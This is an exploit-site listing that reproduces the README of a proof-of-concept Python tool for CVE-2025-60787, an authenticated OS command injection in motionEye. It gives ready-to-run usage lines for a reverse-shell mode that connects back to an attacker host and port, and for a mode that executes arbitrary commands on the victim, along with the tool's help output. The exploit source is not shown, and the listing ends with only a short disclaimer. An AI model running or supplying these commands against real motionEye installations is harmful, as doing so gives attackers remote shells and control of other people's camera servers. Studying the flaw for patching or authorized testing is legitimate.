Exploit for OS Command Injection in Motioneye_Project Motioneye CVE-2025-60787

Name: Exploit for OS Command Injection in Motioneye_Project Motioneye CVE-2025-60787
Rating: 5 (222 reviews)
2026-03-08 | CVSS 7.2
## https://sploitus.com/exploit?id=59F37563-4BC3-52C6-B5A4-948A80F49348
# CVE-2025-60787 - Authenticated RCE in motionEye

PoC for [CVE-2025-60787](https://nvd.nist.gov/vuln/detail/CVE-2025-60787) that is an Authenticated RCE vulnerability for [motionEye](https://github.com/motioneye-project/motioneye) with all afected versions up to 0.43.1b4 (included).

This is an automated PoC for the vulnerability described in [this repository](https://github.com/prabhatverma47/CVE-2025-60787). Credits to [prabhatverma47](https://github.com/prabhatverma47/).

## Usage
The script has 2 commands that abuse the vulnerability. One that directly sends a reverse shell called `revshell` and another command called `command` to directly execute commands abusing this CVE.

```shell-session
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit
```

### Reverse Shell
Use `revshell` command to obtain a shell. For example:
```shell
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
```
Where `10.10.10.10` is the target machine (machine running `motionEye`), `10.10.10.15` is our attacker machine and `9001` is the prot we are listening to catch a reverse shell.


### Command Execution
If instead of a reverse shell we want to execute other commands remotely, we can use `command` option. For example, execute the command `ping -c1 10.10.10.15` in the victim machine:
```shell
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
```
Where `10.10.10.10` is the machine running `motionEye`.


## Disclaimer
Use this script always under your own responsability.

Be ethical (: